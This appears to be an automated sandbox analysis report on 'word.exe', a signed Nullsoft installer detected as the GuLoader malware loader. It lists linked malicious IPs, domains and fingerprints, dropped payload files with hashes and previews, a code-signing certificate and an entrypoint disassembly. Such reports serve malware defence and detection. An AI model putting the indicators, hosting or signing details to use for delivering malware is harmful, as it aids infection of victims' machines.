Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	word.exe
Detection:	MAL
Classification:	mal54.troj.evad.winEXE@3/10@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 55 Number of non-executed functions: 75
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SppExtComObj.Exe, MoUsoCoreWorker.exe, backgroundTaskHost.exe, UsoClient.exe, BackgroundTransferHost.exe, sppsvc.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, slui.exe, WmiApSrv.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, login.live.com, tse1.mm.bing.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, g.bing.com, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: word.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
186.2.171.76	Scan_Docs#672910.exe	Get hash	malicious	GuLoader	Browse
	Scan_docs#70778965.msi	Get hash	malicious	Unknown	Browse
	Scan_docs#.exe	Get hash	malicious	Unknown	Browse
	Scan_docs#.exe	Get hash	malicious	Unknown	Browse
	Scan_docs#04966311.msi	Get hash	malicious	Unknown	Browse
	32x.exe	Get hash	malicious	Unknown	Browse
	32x.exe	Get hash	malicious	Unknown	Browse
	32x.exe	Get hash	malicious	Unknown	Browse
	Scan_docs#.exe	Get hash	malicious	Unknown	Browse
	Scan_docs#46445404.msi	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
filedn.com	964232908.eml	Get hash	malicious	MeshAgent	Browse	23.109.93.100
	http://filedn.com	Get hash	malicious	Unknown	Browse	23.109.93.100
	Kh25PMA7u8.exe	Get hash	malicious	Unknown	Browse	23.109.93.100
	https://workdrive.zoho.com/file/s8yrwa67a53974b474ef79eb70d1033b872c5	Get hash	malicious	HTMLPhisher	Browse	23.109.93.100
	https://filedn.com/lt87R94Oi7NbcQdmzW2xPrR/link.html	Get hash	malicious	HTMLPhisher	Browse	23.109.93.100
	https://www.msn.com/en-ca/lifestyle/rf-buying-guides/redirect?rf_click_source=list&rf_client_click_id=000000000&rf_dws_location=&rf_item_id=502238318&rf_list_id=3519472&rf_partner_id=353781453390&rf_source=ebay&url=aHR0cHM6Ly9maWxlZG4uY29tL2x0Q1JsWTNpVGNkN2RjM3UyUm1KdWFTL2xpbmsuaHRtbA	Get hash	malicious	HTMLPhisher	Browse	23.109.93.100
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2ffiledn.com%2flmtf06DxeexRuabg6razTLL%2ftestoff%2520%281%29.html&c=E,1,AUxv9bLRdb6z4Onh2l2O8FmlxAdL6LQVGldhTgR8KFlv8YvGIKyFlv1-hY-UfXjR3xzRRYwwojP0y6u691T3MUwR5XBYXeYy3z6tGYugygxG5A,,&typo=1	Get hash	malicious	HTMLPhisher	Browse	23.109.93.100
	https://filedn.com/l4wKRwVCsRrpY3cYvATRAtF/Execl.html?email=ron@weasley.com	Get hash	malicious	HTMLPhisher	Browse	23.109.93.100

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DDOS-GUARDCORPBZ	ExeFile (305).exe	Get hash	malicious	Emotet	Browse	190.115.18.139
	ExeFile (323).exe	Get hash	malicious	Emotet	Browse	190.115.18.139
	ExeFile (347).exe	Get hash	malicious	Emotet	Browse	190.115.18.139
	ExeFile (349).exe	Get hash	malicious	Emotet	Browse	190.115.18.139
	ExeFile (369).exe	Get hash	malicious	Emotet	Browse	190.115.18.139
	ExeFile (367).exe	Get hash	malicious	Emotet	Browse	190.115.18.139
	ExeFile (371).exe	Get hash	malicious	Emotet	Browse	190.115.18.139
	ExeFile (378).exe	Get hash	malicious	Emotet	Browse	190.115.18.139
	ExeFile (384).exe	Get hash	malicious	Emotet	Browse	190.115.18.139
	ExeFile (394).exe	Get hash	malicious	Emotet	Browse	190.115.18.139
LEMURIACOUS	Ao3sBU2bWe.lnk	Get hash	malicious	ROKRAT	Browse	74.120.9.90
	QSonyDwBPg.lnk	Get hash	malicious	ROKRAT	Browse	74.120.9.234
	ljsQG2l81U.lnk	Get hash	malicious	ROKRAT	Browse	74.120.9.234
	#Uc774#Uc0c1#Uc6a9.lnk	Get hash	malicious	ROKRAT	Browse	74.120.8.13
	https://u.pcloud.com/trackmail?url=aHR0cHM6Ly90cmFuc2Zlci5wY2xvdWQuY29tL2Rvd25sb2FkLmh0bWw/Y29kZT01WnhoUWlWWjQ4dFNYbnRoSktRWkUwamFaTnBHaTV0aWdKd2puZkh6dklqbW5CdUh1TWprWCM=&token=j7yZZ7ZpkZrwc0kENluc4wtObKMPkdF8xn5b07	Get hash	malicious	Unknown	Browse	74.120.8.6
	M6Y9BzeIBV	Get hash	malicious	Unknown	Browse	74.120.8.13
	M6Y9BzeIBV	Get hash	malicious	Unknown	Browse	74.120.9.233
	http://filedn.com	Get hash	malicious	Unknown	Browse	74.120.8.77
	9FajbP2iUg	Get hash	malicious	CloudMensis	Browse	74.120.9.90
	rokrat.bin.exe	Get hash	malicious	ROKRAT	Browse	74.120.8.15

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
c12f54a3f91dc7bafd92cb59fe009a35	qaG6v7M0Nr.exe	Get hash	malicious	Unknown	Browse	186.2.171.76
	qaG6v7M0Nr.exe	Get hash	malicious	Unknown	Browse	186.2.171.76
	msedge_pwa_launcher.exe	Get hash	malicious	Unknown	Browse	186.2.171.76
	msedge_pwa_launcher.exe	Get hash	malicious	Unknown	Browse	186.2.171.76
	MsvL2pjs5Y.exe	Get hash	malicious	AveMaria, WhiteSnake Stealer	Browse	186.2.171.76
	Scan_Docs#672910.exe	Get hash	malicious	GuLoader	Browse	186.2.171.76
	Scan_docs#70778965.msi	Get hash	malicious	Unknown	Browse	186.2.171.76
	Scan_docs#.exe	Get hash	malicious	Unknown	Browse	186.2.171.76
	Scan_docs#04966311.msi	Get hash	malicious	Unknown	Browse	186.2.171.76
	32x.exe	Get hash	malicious	Unknown	Browse	186.2.171.76
37f463bf4616ecd445d4a1937da06e19	4455.exe	Get hash	malicious	FormBook, GuLoader	Browse	74.120.9.25
	Client.exe	Get hash	malicious	XRed, XWorm	Browse	74.120.9.25
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	74.120.9.25
	file.exe	Get hash	malicious	Vidar	Browse	74.120.9.25
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	74.120.9.25
	kahyts.exe	Get hash	malicious	GuLoader	Browse	74.120.9.25
	FlashUpdates.js	Get hash	malicious	Unknown	Browse	74.120.9.25
	mbdcKkZ3Ag.exe	Get hash	malicious	GuLoader	Browse	74.120.9.25
	4h1Zc12ZBe.exe	Get hash	malicious	Stealc	Browse	74.120.9.25
	FBS2024000000392.docx	Get hash	malicious	Unknown	Browse	74.120.9.25

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exe	remittances.exe	Get hash	malicious	Remcos, GuLoader	Browse
C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dll	remittances.exe	Get hash	malicious	Remcos, GuLoader	Browse
	js8call-2.2.0-win32.exe	Get hash	malicious	Unknown	Browse
	Revised PI_2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Revised PI_2024.exe	Get hash	malicious	GuLoader	Browse
	Revised PI_2024.exe	Get hash	malicious	GuLoader	Browse
	Revised PI_2024.exe	Get hash	malicious	GuLoader	Browse
	Order 8391-6.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Order 8391-6.exe	Get hash	malicious	GuLoader	Browse
	SecuriteInfo.com.Trojan.NSIS.Agent.28595.14804.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Setup.ini

Download File

Process:	C:\Users\user\Desktop\word.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	27
Entropy (8bit):	4.2824842613426
Encrypted:	false
SSDEEP:	3:0kmvClSYjEJS:Vhr4k
MD5:	B73A171C8DE922AFE4E446EC817FF4B3
SHA1:	411D7496D75A03BFB66808B45987CAEC6223A7D5
SHA-256:	F8BAA811A75E4E24939FB0D51A61DD0B6F4FE00DBA0171982D2F8FAE26F5A28C
SHA-512:	5D6B439EDEA4B6650F17494C2076B8896909191B3EE11E382E73066592BF6C13F1EF7F7BD8CE777C80DAD172D998326A8FD0ACBD92B2DB8B2C223882497D1184
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[Auto Clock]..Daily=False..

C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exe

Download File

Process:	C:\Users\user\Desktop\word.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	721136
Entropy (8bit):	7.046029816291204
Encrypted:	false
SSDEEP:	12288:lm5S4Q+lciMbH00Tgv6w2vgTjl3M/Xi/ZrQHXEcR:lm5Sx4c9bHPTgv60dGS/cD
MD5:	0EA4553778672B58BBD711FB039552C8
SHA1:	8487F359428F19444696CE610ED81C6B4DD56A6A
SHA-256:	910AE266EB8177AA46E2A2C77029E57B30D7AAA819C3B8451514BF1B1AE26F8D
SHA-512:	E486DD7CB705E336C8B7E014B2DD53FAF881B74AADB6045D8FD73B59972F95DFBCFE1F58847C7D1D080849E86344FCEADB4AF3DE85F12D8374C966645C50DD2C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: remittances.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....n3T.................\...........2.......p....@.......................... ......f9....@..................................s.......p..................X'...........................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata...0...@...........................rsrc........p.......v..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsh912A.tmp

Download File

Process:	C:\Users\user\Desktop\word.exe
File Type:	data
Category:	dropped
Size (bytes):	1567808
Entropy (8bit):	3.388435624862763
Encrypted:	false
SSDEEP:	6144:pL9U1fBf0tLXYQ/pjJ3grr7h3EE22ysvDTChPfR1WnA5mye74fr28anGYbfSykV9:2BQYsjJgr/FewDER2ye8CkYb0ZjP
MD5:	B08A2CFBE6796515E1ADC9EFBDEAF820
SHA1:	60CC58ACDC3E9C074A84697838EAD34B90DADBDF
SHA-256:	F9C7AC9AA68ED5CD1EAD5551F51EAAF3FBB0808E8F0EF0B71FA3021C5C827645
SHA-512:	8533FB5FBC75201A16F4AB9DAE9F4B2AE99CC3446E83FD97E59F03B868C359AB8A8559E78B3A9B44A59D78DCD0B3C066886FA36B3C3A2C5A534AE7D509EAC940
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\nsh912A.tmp, Author: Joe Security
Reputation:	low
Preview:	........,.....................................................................................................$.............................................................................................................................................................................J...e...........5...j...............................................................................................................................<...........u...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\word.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	5.779567759802416
Encrypted:	false
SSDEEP:	96:UPDYcJ+nx4vVp76JX7zBlkCg21Fxz4THxtrqw1at0JgwLEjo+OB3yUVCdl/wNj+l:UPtkuWJX7zB3kGwfy0nyUVsxCjOMb1u
MD5:	883EFF06AC96966270731E4E22817E11
SHA1:	523C87C98236CBC04430E87EC19B977595092AC8
SHA-256:	44E5DFD551B38E886214BD6B9C8EE913C4C4D1F085A6575D97C3E892B925DA82
SHA-512:	60333253342476911C84BBC1D9BF8A29F811207787FDD6107DCE8D2B6E031669303F28133FFC811971ED7792087FE90FB1FAABC0AF4E91C298BA51E28109A390
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: remittances.exe, Detection: malicious, Browse Filename: js8call-2.2.0-win32.exe, Detection: malicious, Browse Filename: Revised PI_2024.exe, Detection: malicious, Browse Filename: Revised PI_2024.exe, Detection: malicious, Browse Filename: Revised PI_2024.exe, Detection: malicious, Browse Filename: Revised PI_2024.exe, Detection: malicious, Browse Filename: Order 8391-6.exe, Detection: malicious, Browse Filename: Order 8391-6.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.NSIS.Agent.28595.14804.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L....n3T...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text..._........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..b....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\spherosome\preadoption\preembodiment\Himlede\heracleum.txt

Download File

Process:	C:\Users\user\Desktop\word.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	536
Entropy (8bit):	4.268605153256232
Encrypted:	false
SSDEEP:	12:8WFHRMlmST3x4DT2G+Ok4ssQNWK9agHuo:8cHut6TN+EshNN9ato
MD5:	BE4F612D0B8E53593C17B98A99723CFE
SHA1:	6A0AA334AD4BACF533313AC0AFCDA8B45C0BE6ED
SHA-256:	CB480FAD6ED5ACE2139EC360E6A4BF19C4ED43E6DFC8378989589FB4AE8D6AC4
SHA-512:	5E6AF163D65DA916D995CF6B0451EE5F2D6D4D258BEC81F0F10D7BD88B992C5CA7DD181CE0FAA31CBDDDC814EE0771B9CD657208120CE9E81147E091796FA958
Malicious:	false
Preview:	nonmiraculously bjrneklo christoffersen hermafroditternes besvarelserne.forfatternsket seasonings lkkeriernes stersskals laterites metanotum celoms folkereprsentantens semifast eddadigte udnyttelsesgrad toothpowder rejsemontr..entomologised unselfness batikskjorter complexer fedia..udlydskonsonanter lngdemaal bondebefolkningen feltoplysninger klimatiskes..besmykkelsens svanehalsene blyantstiften moonrises,forsorgspdagog decrying baglommen crinion flawedness statsvirksomheder anticyclical evighedsblomstens hypercatalexis bescreen..

C:\Users\user\spherosome\preadoption\preembodiment\Himlede\tilfrte.pro

Download File

Process:	C:\Users\user\Desktop\word.exe
File Type:	data
Category:	dropped
Size (bytes):	374495
Entropy (8bit):	1.245376539048548
Encrypted:	false
SSDEEP:	768:YTCY9kd5RgKrXDohIRNZW9BtgWoWTmygbuO8Ivi/4WipsLVl+ztq0hCZkBX2ZNQx:YT2IvomUti/2QZoMwhzOeDnVOh
MD5:	91AB86EFCEF8A954283176E8D1FB277A
SHA1:	459095BB62971DF047A40A6351B126A00BBE39A8
SHA-256:	E402940C699100D4842127012B8389E57040D81630FAECFD5BC226945DF0C724
SHA-512:	912A91D8398A0DD5358052153753C86CF293E95CBA2F06EF59E20250FA0ABDAA9C4D73CAAB94293060AD786D36887CBDAEFE0969935FCC3D29BF67540DFFEC67
Malicious:	false
Preview:	.......w.........4....................]........+.........]n..........;.....O...............................4...h.....................~............................................................................N...................................................a............x.............................................5............1.......-...................................S..........................P...............................................................................K...................&4.................H..................................&.........N...:k.3..............................................................i.................)..................`...........}...........................w...............Z.............................................Tv........................\................................G............................?....................................r................................................P.............................................

C:\Users\user\spherosome\preadoption\preembodiment\Himlede\twiddle.une

Download File

Process:	C:\Users\user\Desktop\word.exe
File Type:	data
Category:	dropped
Size (bytes):	394571
Entropy (8bit):	1.2517634765986003
Encrypted:	false
SSDEEP:	1536:lgSCQA0jZHWUm0LQ34A0GAphbeuI7rt/tCKK:ZCQA0jwUm0b5GA67RFFK
MD5:	F0E68C57B3CC765BCA4535C863FEEFFB
SHA1:	EDC71DFF1644C71948073B988B5B9C286D79AB7F
SHA-256:	85D226BA6ECE9411F59066ACD17B8B0D7EF4C8D6183424C8B1722FDD856B9F30
SHA-512:	844017EF8E9431F9DD962F6BF9EF6D12069903AE82C5F0B92DC9F4ED4F9CE425327DFC1370D1123DA6970A16FE7A86A352ECEA6217BCA4CEF5F8CF99447592FE
Malicious:	false
Preview:	D........+J..............v.............-.............................................................,........................9................................r.........................................................................................5................................................!....a.........{......z.............................`........................9..R......;............5..............................................=................f..............[...............d.............................@..j......'..............s..............B............@....N......................................................................,............@............................................u.......................................................i.......-..f...D............................._...........P......................................................o..........7..............:..............................................................................................

C:\Users\user\spherosome\preadoption\preembodiment\Motived.Bje

Download File

Process:	C:\Users\user\Desktop\word.exe
File Type:	data
Category:	dropped
Size (bytes):	206209
Entropy (8bit):	4.617348835922011
Encrypted:	false
SSDEEP:	3072:a5G61R18/J9GK2z5akj2H3RsAmn/E5T74fr2qIQan47Ybfjkrp:GR1WnA5mye74fr28anGYbfC
MD5:	09D06FF74381984DBB4607A73DC23228
SHA1:	43453C71DCA57123F1D0E6D6DE875DD6139E9C30
SHA-256:	3DD6DC560DA426B32755B8CFABD3D30922069D0DA799CC87A2BC8E1EFD57D61D
SHA-512:	ABA179A3FAE821113977D7E5F5D1A163D77F87F118DE3CAB50AE91267F2D034EFA7448B5717068E6085714DD51C6248E0B4393D931AC60E64B659ADC634952DC
Malicious:	false
Preview:	.........=...~~...#.............5........+...............\|............I...............X...:.....E...''....RRR.....~..YY.D....\|\|.".;.nn.......8..........................h..................+.........RR...........................Y..........mmmmmm.ccc.^^^.P..t............BBBB.................oo................................EE.........H.>.......... ................TT....e........x......s....0.//..u.=..[..........}}....................eee........................................88...88..h.SSS.....//....+...ss.!!..<....TTTT.ZZZZ........,,....\.....!!!!.....44...j...==.IIII....D.v....kk..NNNN.i.......aaaa...f....TT.....[.p....<..............2...rr...pp......?.................".`.....E.........................9....oo..i...............s.......ccc.^...................ppp...JJ.............}}.................\\..11.........cccc...........j.11.yy.....p.?........L.S...G.....p....b...........5..........TTTT........""""...............[[[[[[[[[[....................BB."".............k...4.U............

C:\Users\user\spherosome\preadoption\preembodiment\Skankebens.ans

Download File

Process:	C:\Users\user\Desktop\word.exe
File Type:	data
Category:	dropped
Size (bytes):	276174
Entropy (8bit):	1.2506111113423
Encrypted:	false
SSDEEP:	768:8/vLZXBddeBzKuPGseNv/5mcdnIa6M2SxeG4Uzt17zGmvH9ICanlTL/E/5s/SyuJ:9SvdIcTzqHnpKEdBmIg
MD5:	906C52BEDBBED70B5BFBC362478D3784
SHA1:	DBB2F4007D172ACED50A9AF21CCAF2335DC1906A
SHA-256:	005C018659AAAC011D7ED6C114F3E49411287B19AC7BE710D1ED235D6071D777
SHA-512:	B1D080DC06235811B2B573188E15E1F9DD78CC561CA10C3F0474ACFA387D5C890E871BACE54734052F3CE4452A08BD01D6F4C3BC65123C5FB04763C18CABB733
Malicious:	false
Preview:	............s...................................................................)....D..............................U.......................................................*..............................................3h..............................................................................P........;.................P.................................r............@.......................j...z.......................@..n...............^..................................................................Y......}..................(............k..........]........g.....>.........t........-...................................................................%.......................)..................X.......................................................U...P..........4...................Q........8................................................#............c...M....................................................................................................e..........................

C:\Users\user\spherosome\preadoption\preembodiment\Unending.die

Download File

Process:	C:\Users\user\Desktop\word.exe
File Type:	data
Category:	dropped
Size (bytes):	296460
Entropy (8bit):	7.660304624051589
Encrypted:	false
SSDEEP:	3072:2mOUMar7v5gJYH91IZ4f0tLYd8XYCf/qoLappsZJ8vsgEoCUM623Wc45jLbitE2d:UU1fBf0tLXYQ/pjJ3grr7h3EE22y7
MD5:	DAE47A82BCB84F449AE3CC1AAFD61320
SHA1:	2CD6CB2AFF6E1B46A0488930E7B2283A87ABF5AE
SHA-256:	BC97A3581BB801B273A1DCC18AF01AEC4A378070FD67F99DEAB1FC9A5BD54C9E
SHA-512:	C36256D85C0441DA2590A5835E847A6EA1819A41047D7E136056F8C3DC0FC36299402AF8824CB417DABB88BE613BD48214A48298E09A7A6AA5D911A033D3B686
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\spherosome\preadoption\preembodiment\Unending.die, Author: Joe Security
Preview:	.......b.........!..........~~~~....................]........%.....e.....S.................)))..........H.y....z......................(.........o............''...\|...............7................c........]...............33.......................mm...........11.....B..ee..ttt..........................KKKKKKKK....FFF.*...............V............9.====.......M.._.......::............++++........ ....j....z.ccc............V............)))....................................................}}}.....WWWW..........t.....................................Y.........Q..EEEE./.......XX...222..BB......<..n...>>..R......................H..........!!.....w...............i.Y....G....e.///.gggg.........3...--..........R...."""""....-----..............J....nnnnn..........................~..................................vv............................55................`.........................4..}.....p............................z......s..<.%.\|\|\|\|......YY......r............GGGG..................?......

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.046029816291204
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	word.exe
File size:	721'136 bytes
MD5:	0ea4553778672b58bbd711fb039552c8
SHA1:	8487f359428f19444696ce610ed81c6b4dd56a6a
SHA256:	910ae266eb8177aa46e2a2c77029e57b30d7aaa819c3b8451514bf1b1ae26f8d
SHA512:	e486dd7cb705e336c8b7e014b2dd53faf881b74aadb6045d8fd73b59972f95dfbcfe1f58847c7d1d080849e86344fceadb4af3de85f12d8374c966645c50dd2c
SSDEEP:	12288:lm5S4Q+lciMbH00Tgv6w2vgTjl3M/Xi/ZrQHXEcR:lm5Sx4c9bHPTgv60dGS/cD
TLSH:	92E4021BF34A5122ECA14B758DEBD32593683E022F02865F335EAB1E3D731625E4B65C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....n3T.................\...........2.......p....@

File Icon


Icon Hash:	1070e0c282c2ca1c

Static PE Info

General

Entrypoint:	0x403217
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x54336EB1 [Tue Oct 7 04:40:17 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	59a4a44a250c4cf4f2d9de2b3fe5d95f

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	21/08/2024 14:11:55 21/08/2025 14:11:55
Subject Chain	OID.1.3.6.1.4.1.311.60.2.1.3=GB, OID.2.5.4.15=Private Organization, CN=Strategc Ltd, SERIALNUMBER=12011673, O=Strategc Ltd, L=London, C=GB
Version:	3
Thumbprint MD5:	E9D0FD1CF050F6EF1774D271AB839CB4
Thumbprint SHA-1:	E098218628CF43BB0A0B14ADFD827402B403D9A3
Thumbprint SHA-256:	A3EE59FBCA4388FEFC613B7CB3E2B67CF273BCEE3DB5CEDB1E0A8860D61DC04F
Serial:	6065907A370AC3B27ABA472CD9F7ED3D

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409130h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407034h]
push 00008001h
call dword ptr [004070B4h]
push ebx
call dword ptr [0040728Ch]
push 00000009h
mov dword ptr [004237B8h], eax
call 00007FA978EC7095h
mov dword ptr [00423704h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041ECB8h
call dword ptr [00407164h]
push 004091E4h
push 00422F00h
call 00007FA978EC6D3Fh
call dword ptr [004070B0h]
mov ebp, 00429000h
push eax
push ebp
call 00007FA978EC6D2Dh
push ebx
call dword ptr [00407118h]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [00423700h], eax
mov eax, ebp
jne 00007FA978EC42DCh
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007FA978EC67BDh
push eax
call dword ptr [00407220h]
mov dword ptr [esp+1Ch], eax
jmp 00007FA978EC4395h
cmp cl, 00000020h
jne 00007FA978EC42D8h
inc eax
cmp byte ptr [eax], 00000020h
je 00007FA978EC42CCh

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73a4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x37000	0x2a480	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xad998	0x2758
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5bf4	0x5c00	92032f5e50e74fe0fe80a33ba4ca92db	False	0.6700067934782609	data	6.478210757314278	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x11ce	0x1200	5801d712ecba58aa87d1e7d1aa24f3aa	False	0.4522569444444444	OpenPGP Secret Key	5.236122428806677	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1a7f8	0x400	f2470ac8847791744aff280e7e2f5353	False	0.615234375	data	5.025395707292401	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0x13000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x37000	0x2a480	0x2a600	706453fb128cb78c6b3ea873f5dee1af	False	0.1464498064159292	data	1.8972569486065036	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x37358	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m	English	United States	0.0786555069206199
RT_ICON	0x47b80	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 2835 x 2835 px/m	English	United States	0.09131280218625185
RT_ICON	0x51028	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 2835 x 2835 px/m	English	United States	0.10097042513863216
RT_ICON	0x564b0	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m	English	United States	0.10108644307982995
RT_ICON	0x5a6d8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m	English	United States	0.11213692946058092
RT_ICON	0x5cc80	0x213a	PNG image data, 256 x 256, 8-bit gray+alpha, non-interlaced	English	United States	0.9934164119445098
RT_ICON	0x5edc0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m	English	United States	0.08888367729831144
RT_ICON	0x5fe68	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 2835 x 2835 px/m	English	United States	0.17254098360655737
